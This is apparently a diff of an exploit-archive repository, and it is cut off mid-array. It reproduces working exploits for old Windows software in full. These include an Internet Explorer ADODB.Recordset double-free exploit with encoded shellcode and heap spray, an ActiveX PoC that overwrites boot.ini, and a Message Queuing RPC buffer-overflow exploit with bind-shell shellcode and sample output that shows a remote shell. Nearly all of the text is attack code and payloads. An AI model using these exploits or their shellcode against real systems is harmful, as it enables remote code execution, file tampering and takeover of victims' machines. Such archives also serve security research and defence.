+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v/recolorinfo>
+</html>
+BODY
+open H,">$html" or die $! and exit;
+print H $body;
+
+# milw0rm.com [2007-01-17]

platforms/windows/remote/33326.py

@@ -1,4 +1,6 @@
-## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server'
+## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
+## For this specific exploit to work, easy chat must be installed to:
+## 'C:\Program Files\EFS Software\Easy Chat Server'
 
 
 # Exploit Title: Easy Chat Server 3.1 stack buffer overflow

platforms/windows/remote/3577.html

@@ -1,149 +1,149 @@
-<HTML>
-<!--
-**********************************************************************************
-Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009).
-**********************************************************************************
-Review:
-This code exploit "double free error" in msado15.dll NextRecordset() function.
-As a result of double freeing of same string, rewriting of Heap Control Block 
-by malicious data is occuring. 
-Technique of exploitation is based on "Lookaside remapping".
-Runs calc.exe if success.
--->
-<HEAD>
-	<OBJECT id=obj classid=clsid:00000535-0000-0010-8000-00AA006D2EA4></OBJECT>
-</HEAD>
-
-<BODY onLoad='Go()'>
-
-<script language=javascript>
-
-//------------------Replace with your code-----------------------//
-	var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
-//------------------Replace with your code-----------------------//
-
-
-//-------------Heap Repair Code. Do not Replace------------------//
-		var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05%u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u8303%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E%u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u6642%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
-//-------------Heap Repair Code. Do not Replace------------------//
-
-var part1 = '';
-var part2 = '';
-var partLen = 127;
-
-function PrepMem()
-{
-//Standard Heap Spray Code
-var heapSprayToAddress = 0x05050505;
-
-	var payLoadCode = HeapRepairCode + Shellcode;
-	var heapBlockSize = 0x400000;
-	var payLoadSize = payLoadCode.length * 2;
-	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
-	var spraySlide = unescape("%u9090%u9090");
-	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
-	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
-	memory = new Array();
-
-	for (i=0;i<heapBlocks;i++)
-	{
-		memory[i] = spraySlide + payLoadCode;
-	}
-
-	function getSpraySlide(spraySlide, spraySlideSize)
-	{
-		while (spraySlide.length*2<spraySlideSize)
-		{
-			spraySlide += spraySlide;
-		}
-		spraySlide = spraySlide.substring(0,spraySlideSize/2);
-		return spraySlide;
-	}
-}
-
-
-function GetSystemVersion()
-{
- //Simple Detecting of OS version out of Jscript version:
-		
-		var  ver = "";
-		ver += ScriptEngineMajorVersion();
-		ver += ScriptEngineMinorVersion();
-		ver += ScriptEngineBuildVersion();
-		
-		if 	( ver<568820 ){ return("preSP2"); }
-		else if ( ver<575730 ){ return("SP2"); }
-		else return (0);
-}
-
-
-function PrepJmpcode(sp)
-{
-	switch(sp){
-			case "preSP2":
-					
-					var egg="";
-					egg+=unescape("%u0608%u0014");		
-					egg+=unescape("%u0000%u0000");
-					egg+=unescape("%uF708%u0013");		
-					egg+=unescape("%u0000%u0101");
-					egg+=unescape("%uFFFF%uFFFF");
-					egg+=unescape("%uFFFF%uFFFF");
-					
-					part1+=unescape("%u0400%u0014");	
-					part1+=unescape("%u320C%u77FC");	
-					while (part1.length<partLen) {part1+=unescape("%u0505");}// ptr* shellcode							
-					
-					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
-					part2+=egg;						
-					
-					break;	
-
-		
-			case "SP2":
-					
-					var egg="";
-					egg+=unescape("%u0608%u0014");		
-					egg+=unescape("%u0000%u0000");
-					egg+=unescape("%uF708%u0013");		
-					egg+=unescape("%u0000%u0101");		
-					egg+=unescape("%uFFFF%uFFFF");
-					egg+=unescape("%uFFFF%uFFFF");
-					
-					part1+=unescape("%u0505%u0505");	
-					part1+=unescape("%ue128%u75c7");	
-					while (part1.length<partLen) {part1+=unescape("%uFFFF");}								
-					
-					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
-					part2+=egg;						
-					
-					break;	
-		}
-}
-
-function Exploit()
-{
-		var arr=new Array();
-		var i=1;
-		
-		while(i<500){
-				try{
-				k=1;
-				while(k<500){ arr[k]=part1+part2; k++; }
-				obj.NextRecordset( part1+part2 );
-				}catch(e){}
-				i++;
-					}
-}
-
-function Go(){
-	PrepMem();
-	PrepJmpcode( GetSystemVersion() );
-	Exploit();
-}
-
-</script>
-</body>
-</html>
-
-# milw0rm.com [2007-03-26]
+<HTML>
+<!--
+**********************************************************************************
+Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009).
+**********************************************************************************
+Review:
+This code exploit "double free error" in msado15.dll NextRecordset() function.
+As a result of double freeing of same string, rewriting of Heap Control Block 
+by malicious data is occuring. 
+Technique of exploitation is based on "Lookaside remapping".
+Runs calc.exe if success.
+-->
+<HEAD>
+	<OBJECT id=obj classid=clsid:00000535-0000-0010-8000-00AA006D2EA4></OBJECT>
+</HEAD>
+
+<BODY onLoad='Go()'>
+
+<script language=javascript>
+
+//------------------Replace with your code-----------------------//
+	var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+//------------------Replace with your code-----------------------//
+
+
+//-------------Heap Repair Code. Do not Replace------------------//
+		var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05%u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u8303%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E%u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u6642%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
+//-------------Heap Repair Code. Do not Replace------------------//
+
+var part1 = '';
+var part2 = '';
+var partLen = 127;
+
+function PrepMem()
+{
+//Standard Heap Spray Code
+var heapSprayToAddress = 0x05050505;
+
+	var payLoadCode = HeapRepairCode + Shellcode;
+	var heapBlockSize = 0x400000;
+	var payLoadSize = payLoadCode.length * 2;
+	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+	var spraySlide = unescape("%u9090%u9090");
+	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+	memory = new Array();
+
+	for (i=0;i<heapBlocks;i++)
+	{
+		memory[i] = spraySlide + payLoadCode;
+	}
+
+	function getSpraySlide(spraySlide, spraySlideSize)
+	{
+		while (spraySlide.length*2<spraySlideSize)
+		{
+			spraySlide += spraySlide;
+		}
+		spraySlide = spraySlide.substring(0,spraySlideSize/2);
+		return spraySlide;
+	}
+}
+
+
+function GetSystemVersion()
+{
+ //Simple Detecting of OS version out of Jscript version:
+		
+		var  ver = "";
+		ver += ScriptEngineMajorVersion();
+		ver += ScriptEngineMinorVersion();
+		ver += ScriptEngineBuildVersion();
+		
+		if 	( ver<568820 ){ return("preSP2"); }
+		else if ( ver<575730 ){ return("SP2"); }
+		else return (0);
+}
+
+
+function PrepJmpcode(sp)
+{
+	switch(sp){
+			case "preSP2":
+					
+					var egg="";
+					egg+=unescape("%u0608%u0014");		
+					egg+=unescape("%u0000%u0000");
+					egg+=unescape("%uF708%u0013");		
+					egg+=unescape("%u0000%u0101");
+					egg+=unescape("%uFFFF%uFFFF");
+					egg+=unescape("%uFFFF%uFFFF");
+					
+					part1+=unescape("%u0400%u0014");	
+					part1+=unescape("%u320C%u77FC");	
+					while (part1.length<partLen) {part1+=unescape("%u0505");}// ptr* shellcode							
+					
+					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
+					part2+=egg;						
+					
+					break;	
+
+		
+			case "SP2":
+					
+					var egg="";
+					egg+=unescape("%u0608%u0014");		
+					egg+=unescape("%u0000%u0000");
+					egg+=unescape("%uF708%u0013");		
+					egg+=unescape("%u0000%u0101");		
+					egg+=unescape("%uFFFF%uFFFF");
+					egg+=unescape("%uFFFF%uFFFF");
+					
+					part1+=unescape("%u0505%u0505");	
+					part1+=unescape("%ue128%u75c7");	
+					while (part1.length<partLen) {part1+=unescape("%uFFFF");}								
+					
+					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
+					part2+=egg;						
+					
+					break;	
+		}
+}
+
+function Exploit()
+{
+		var arr=new Array();
+		var i=1;
+		
+		while(i<500){
+				try{
+				k=1;
+				while(k<500){ arr[k]=part1+part2; k++; }
+				obj.NextRecordset( part1+part2 );
+				}catch(e){}
+				i++;
+					}
+}
+
+function Go(){
+	PrepMem();
+	PrepJmpcode( GetSystemVersion() );
+	Exploit();
+}
+
+</script>
+</body>
+</html>
+
+# milw0rm.com [2007-03-26]

platforms/windows/remote/3892.html

@@ -1,20 +1,20 @@
-<html>
-<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
-<body>
-
-<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 
-
-</OBJECT>
-<script language="vbscript">
-//next script is converted to UTF16
- target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
- target.SessionAuthor="Andres Tarasco Acuna"
- target.SessionEmailContact="atarasco_at_gmail.com"
- target.SessionURL="http://www.514.es"
- target.SaveAs "c:\boot.ini"
-</script>
-
-</body>
-</html>
-
-# milw0rm.com [2007-05-10]
+<html>
+<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
+<body>
+
+<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 
+
+</OBJECT>
+<script language="vbscript">
+//next script is converted to UTF16
+ target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
+ target.SessionAuthor="Andres Tarasco Acuna"
+ target.SessionEmailContact="atarasco_at_gmail.com"
+ target.SessionURL="http://www.514.es"
+ target.SaveAs "c:\boot.ini"
+</script>
+
+</body>
+</html>
+
+# milw0rm.com [2007-05-10]

platforms/windows/remote/4745.cpp

@@ -1,355 +1,355 @@
-/*
-Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
-by axis
-http://www.ph4nt0m.org
- 
-  you should know the dnsname of target to trigger this vuln
-  the service runs on port 2103/2105/2107
- 
-D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
---------------------------------------------------------------------------
--== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
--== code by axis@ph4nt0m ==-
--== Http://www.ph4nt0m.org ==-
--== Tested against Windows 2000 server SP4 ==-
---------------------------------------------------------------------------
- 
-[+] Attacking default port 2103
-[*]Sending our Payload, Good Luck! ^_^
-[*]Sending RPC Bind String!
-[*]Sending RPC Request Now!
- 
-D:\soft\develop\MyProjects\temp\Debug>
- 
- 
-D:\>nc -vv -n 192.168.152.100 1154
-(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
-Microsoft Windows 2000 [Version 5.00.2195]
-(C) 版权所有 1985-2000 Microsoft Corp.
- 
-C:\WINNT\system32>exit
-exit
-sent 5, rcvd 109: NOTSOCK
- 
-D:\>
- 
- 
-*/
-#include <stdio.h>
-#include <stdlib.h>
-#include <ctype.h>
-#include <winsock.h>
-#include <io.h>
-#pragma comment(lib,"ws2_32")
- 
-// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
-char bind_str[] = {
-0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
-0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
-0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
-0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
-0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
-0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
- 
- 
-// RPC Request  Opnum: 0x06 
-char request_1[] = {
-0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
-0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
-0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
-0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)
-0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
-0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
-0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
-0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
-0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42 jmpcode
-0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx
-0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode
-0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
-0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
-0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
-0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
-0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
-0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
-0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
-0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
-0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
-0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
-0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
-0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
-0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
-0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
-0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
-0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
-0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
-0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
-0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
-0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
-0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
-0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
-0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
-0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
-0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
-0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
-0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
-0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
-0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
-0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
-0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
-0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
-0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
-0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
-0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
-0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
-0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
-0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
-0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
-0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
-0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
-0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
- 
- 
-char request_2[] = {
-0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
-0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
-0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
